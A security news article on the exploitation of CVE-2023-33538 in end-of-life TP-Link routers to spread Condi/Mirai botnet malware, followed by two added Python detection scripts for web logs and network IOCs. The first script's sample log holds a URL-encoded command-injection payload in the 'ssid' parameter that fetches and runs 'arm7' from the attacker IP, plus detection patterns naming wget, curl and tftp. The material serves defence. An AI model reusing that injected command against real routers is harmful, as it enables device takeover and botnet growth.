Hackers are actively exploiting a critical vulnerability, CVE-2023-33538, in several end-of-life TP-Link Wi-Fi routers to deploy Mirai-based botnet malware. These unpatched devices, which no longer receive security updates from the vendor, are prime targets for attackers looking to grow their botnets. The flaw lies in the routers’ web management interface: a wireless-settings parameter is handled unsafely, letting an authenticated attacker run commands on the device remotely.
The vulnerability affects specific models including the TL-WR940N (versions 2 and 4), TL-WR740N (versions 1 and 2), and TL-WR841N (versions 8 and 10). Researchers at Palo Alto Networks’ Unit 42 identified large-scale, automated exploitation attempts of this flaw around June 2025, shortly after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-33538 to its Known Exploited Vulnerabilities (KEV) catalog. The attacks rely on a weakness shared by the firmware of all three models, which lets attackers take control of the device.
Inside the CVE-2023-33538 Exploit and Mirai Malware
The exploitation method involves sending specially crafted HTTP GET requests to the /userRpm/WlanNetworkRpm endpoint of the affected TP-Link routers. Attackers embed shell commands in the ‘ssid’ parameter of these requests. Because the firmware does not validate the parameter before using it, the embedded commands are passed through unfiltered and executed. This oversight lets an authenticated attacker inject and run arbitrary commands on the device.
Once the commands are accepted, the router is instructed to download an ELF binary, identified as ‘arm7’, from a remote server at IP address 51.38.137[.]113. The file is then marked executable and run immediately, handing control of the compromised router to the attacker. The ‘arm7’ binary is a variant of the Condi IoT botnet, a malware family derived from the notorious Mirai botnet. Upon successful infection, the malware establishes a connection to a command-and-control (C2) server, integrating the compromised device into a larger botnet.
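The following is an added detection example, not code from the article or from Unit 42. It scans router web-server access logs for the request shape described above: a GET to /userRpm/WlanNetworkRpm whose ‘ssid’ or ‘ssid1’ value carries shell metacharacters or fetch-and-run tooling. The Common Log Format layout, the shell-metacharacter heuristics and the sample log lines (including the encoded payload) are this example's own assumptions; the download host is the one named in the article.

```python
"""
Flag CVE-2023-33538-style command injection attempts against the
/userRpm/WlanNetworkRpm page in router web-server access logs.

Added example.  The log layout, the heuristics and the sample lines
are constructed for illustration, not taken from a real capture.
"""
import re
from urllib.parse import parse_qsl, urlsplit

VULN_PATH = "/userRpm/WlanNetworkRpm"
# 'ssid1' is the vulnerable attribute; 'ssid' is what the observed attacks hit.
SSID_PARAMS = ("ssid", "ssid1")
# Indicator from the article, kept defanged in source and refanged at load time.
DOWNLOAD_HOST = "51.38.137[.]113".replace("[.]", ".")

SHELL_META = re.compile(r"[;|&`]|\$\(")           # command separators / substitution
FETCH_CMD = re.compile(r"\b(wget|curl|tftp)\b")   # fetch-and-run tooling
URL_RE = re.compile(r"https?://[^\s;|&'\"`]+")
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_clf(line):
    """Split a Common Log Format line into client, timestamp, method, target, status."""
    m = CLF_RE.match(line)
    if not m:
        return None
    client, ts, method, target, status = m.groups()
    return {"client": client, "ts": ts, "method": method, "target": target, "status": int(status)}


def analyze_target(target):
    """Return a finding for an injection attempt in the SSID parameters, else None."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    # parse_qsl percent-decodes and turns '+' into spaces, as the router would.
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    for name in SSID_PARAMS:
        value = params.get(name)
        if value is None:
            continue
        if SHELL_META.search(value) or FETCH_CMD.search(value):
            url = URL_RE.search(value)
            return {
                "param": name,
                "payload": value,
                "download_url": url.group(0) if url else None,
                "known_download_host": DOWNLOAD_HOST in value,
                # Observed attacks hit 'ssid'; only 'ssid1' reaches the flaw.
                "hits_vulnerable_param": name == "ssid1",
                # wget is usually absent from these BusyBox builds.
                "relies_on_wget": bool(re.search(r"\bwget\b", value)),
            }
    return None


def scan_log(lines):
    """Run every log line through the analyzer and collect findings with client IPs."""
    findings = []
    for line in lines:
        req = parse_clf(line)
        if not req:
            continue
        finding = analyze_target(req["target"])
        if finding:
            finding.update(client=req["client"], ts=req["ts"])
            findings.append(finding)
    return findings


# Constructed sample log.  PAYLOAD decodes to:
#   `wget http://51.38.137.113/arm7 -O /tmp/arm7;chmod 777 /tmp/arm7;/tmp/arm7`
PAYLOAD = "%60wget+http%3A%2F%2F51.38.137.113%2Farm7+-O+%2Ftmp%2Farm7%3Bchmod+777+%2Ftmp%2Farm7%3B%2Ftmp%2Farm7%60"
SAMPLE_LOG = [
    '192.168.0.10 - - [16/Jun/2025:10:01:02 +0000] "GET /userRpm/WlanNetworkRpm?ssid1=HomeNet&Save=Save HTTP/1.1" 200 1245',
    f'203.0.113.5 - - [16/Jun/2025:10:05:44 +0000] "GET /userRpm/WlanNetworkRpm?ssid={PAYLOAD}&Save=Save HTTP/1.1" 200 1245',
    f'203.0.113.5 - - [16/Jun/2025:10:05:49 +0000] "GET /userRpm/WlanNetworkRpm?ssid1={PAYLOAD}&Save=Save HTTP/1.1" 200 1245',
    '192.168.0.10 - - [16/Jun/2025:10:07:13 +0000] "GET /userRpm/WlanNetworkRpm?ssid1=test%3Breboot&Save=Save HTTP/1.1" 200 1245',
    '192.168.0.10 - - [16/Jun/2025:10:08:00 +0000] "GET /userRpm/StatusRpm.htm HTTP/1.1" 200 4102',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["client"], f["param"], f["download_url"], f["hits_vulnerable_param"])
```

The `hits_vulnerable_param` and `relies_on_wget` fields separate the sloppy in-the-wild attempts from a request that would actually reach the flaw, which is useful when triaging: a hit on ‘ssid1’ without wget deserves more urgency than the broken payload the article describes.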
The C2 domain associated with these Mirai-like botnet operations, cnc.vietdediserver[.]shop, has been confirmed as malicious. Unit 42’s analysis showed that the arm7 binary is built to persist and to grow the botnet. It waits for commands from its C2 server, matched by specific byte patterns, and alongside that it sends regular heartbeat signals to keep the connection alive, runs self-update routines so that it stays functional and current, and starts an HTTP server of its own on the device.
Inside the Arm7 Malware Binary
A significant feature of the arm7 malware is its self-update mechanism. The ‘update_bins()’ function within the binary is hard-coded to connect back to the IP address 51.38.137[.]113 on TCP port 80. From this server, it can download updated versions of itself compiled for a variety of CPU architectures, including arm6, mips, sh4, and x86_64. This ensures that the malware can infect and operate on a wide range of Internet of Things (IoT) devices.
Furthermore, the arm7 binary initiates an HTTP server on the infected router. This server operates on a randomly selected port between 1024 and 65535. Once active, this local HTTP server serves fresh copies of the malware to any other devices that connect to it. This feature allows each newly infected router to act as a distribution point, spreading the infection across networks without direct intervention from the initial attacker.
Despite the ongoing exploitation, researchers observed technical errors in the attack attempts. Attackers targeted the ‘ssid’ parameter instead of the ‘ssid1’ parameter, which is the actual vulnerable attribute. Additionally, the injected commands relied on the ‘wget’ utility, which is typically absent from the routers’ limited BusyBox environment, so even a request that reached the vulnerable code path would fail to fetch the payload. The underlying vulnerability is nonetheless confirmed, and a more careful attacker could successfully compromise these devices.
TP-Link has confirmed that the affected routers are end-of-life and will not receive any vendor patches. The company strongly advises users to replace these vulnerable devices with currently supported hardware. Changing the default administrator login credentials from ‘admin:admin’ is also a critical security measure, as exploiting CVE-2023-33538 requires authenticated access to the router’s web interface. Network administrators should monitor outbound traffic for connections to the domain and IP address identified above, and retire any affected TP-Link router models they find on their networks.
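As an added example of the monitoring recommended above (not code from the article or from Unit 42), the script below matches egress records against the indicators the article names: DNS lookups of the C2 domain, connections to the update host on TCP/80 (the channel update_bins() uses), and, as a noisy heuristic drawn from the peer-distribution behaviour described earlier, HTTP between two internal hosts on a port in the 1024-65535 range. The log line layouts and the sample records are constructed for this example.

```python
"""
Match egress DNS and flow records against the indicators in this article.

Added example.  Field layouts ('<ts> <client> <query>' for DNS and
'<ts> <proto> <src> <sport> <dst> <dport> <service>' for flows) and the
sample records are assumptions made for illustration.
"""
import ipaddress

# Indicators from the article, kept defanged in source and refanged at load time.
C2_DOMAIN = "cnc.vietdediserver[.]shop".replace("[.]", ".")
UPDATE_HOST = "51.38.137[.]113".replace("[.]", ".")
UPDATE_PORT = 80  # update_bins() is hard-coded to this host on TCP/80

PRIVATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in PRIVATE_NETS)


def check_dns(line):
    """Flag a lookup of the C2 domain (case-insensitive, trailing dot tolerated)."""
    ts, client, query = line.split()
    if query.rstrip(".").lower() == C2_DOMAIN:
        return {"ts": ts, "host": client, "kind": "c2-dns", "detail": query}
    return None


def check_flow(line):
    """Flag traffic to the update host, and internal HTTP on a high port as a heuristic."""
    ts, proto, src, sport, dst, dport, service = line.split()
    dport = int(dport)
    base = {"ts": ts, "host": src, "detail": f"{proto} {dst}:{dport}"}
    if dst == UPDATE_HOST and proto == "tcp" and dport == UPDATE_PORT:
        return {**base, "kind": "update-channel"}
    if dst == UPDATE_HOST:
        return {**base, "kind": "ioc-ip"}
    # Heuristic only: an infected router serves copies of itself over HTTP on a
    # random port in 1024-65535, so internal-to-internal HTTP on a high port is
    # worth a look.  Expect false positives from legitimate internal services.
    if service == "http" and is_internal(src) and is_internal(dst) and dport >= 1024:
        return {**base, "kind": "peer-http-high-port"}
    return None


def scan(dns_lines, flow_lines):
    findings = [f for f in map(check_dns, dns_lines) if f]
    findings += [f for f in map(check_flow, flow_lines) if f]
    return findings


def hosts_to_isolate(findings):
    """Hosts with a hard indicator (the heuristic excluded): candidates for retirement."""
    return sorted({f["host"] for f in findings if f["kind"] in ("c2-dns", "update-channel", "ioc-ip")})


# Constructed sample records.  192.168.0.1 plays the infected router.
SAMPLE_DNS = [
    "1750068001 192.168.0.1 cnc.vietdediserver.shop",
    "1750068002 192.168.0.10 www.example.com",
]
SAMPLE_FLOWS = [
    "1750068003 tcp 192.168.0.1 40211 51.38.137.113 80 http",    # update_bins() fetch
    "1750068004 udp 192.168.0.10 51234 8.8.8.8 53 dns",
    "1750068005 tcp 192.168.0.20 51022 192.168.0.1 37841 http",  # peer pulling a copy
    "1750068006 tcp 192.168.0.10 51300 192.168.0.1 80 http",     # ordinary admin UI
]

if __name__ == "__main__":
    results = scan(SAMPLE_DNS, SAMPLE_FLOWS)
    for f in results:
        print(f["ts"], f["kind"], f["host"], f["detail"])
    print("isolate:", hosts_to_isolate(results))
```

Only the hard indicators feed `hosts_to_isolate`; the high-port heuristic is reported separately so that an analyst can confirm the serving host is an affected TP-Link model before acting on it.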